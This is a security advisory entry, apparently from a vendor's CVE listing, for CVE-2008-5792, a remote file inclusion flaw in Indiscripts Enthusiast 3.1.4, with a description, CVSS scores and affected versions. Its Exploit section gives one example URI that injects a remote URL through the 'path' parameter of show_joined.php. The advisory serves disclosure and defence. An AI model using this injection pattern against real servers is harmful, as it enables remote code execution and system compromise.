CVE-2008-5792 - Code Injection vulnerability in Indisguise Indiscripts Enthusiast 3.1.4

Publication

2008-12-31

Last modification

2018-10-11

Summary

PHP remote file inclusion vulnerability in show_joined.php in Indiscripts Enthusiast 3.1.4, and possibly earlier, allows remote attackers to execute arbitrary PHP code via a URL in the path parameter. NOTE: the researcher also points out the analogous directory traversal issue.

Description

Indiscripts Enthusiast is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.Enthusiast 3.1.4 is vulnerable; other versions may also be affected.

Solution

Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: info@vumetric.com.

Exploit

Attackers can exploit this issue via a browser.The following example URI is available:http://www.example.com/enth_3.1.4/enth3/show_joined.php?path=http://www.example2.com

Classification

CWE-94 - Code Injection

Risk level (CVSS AV:N/AC:M/Au:N/C:P/I:P/A:P)

Medium

6.8

Access Vector

  • Network
  • Adjacent Network
  • Local

Access Complexity

  • Low
  • Medium
  • High

Authentication

  • None
  • Single
  • Multiple

Confident. Impact

  • Complete
  • Partial
  • None

Integrity Impact

  • Complete
  • Partial
  • None

Affected Products

Vendor Product Versions
Indisguise Indiscripts Enthusiast  3.1.4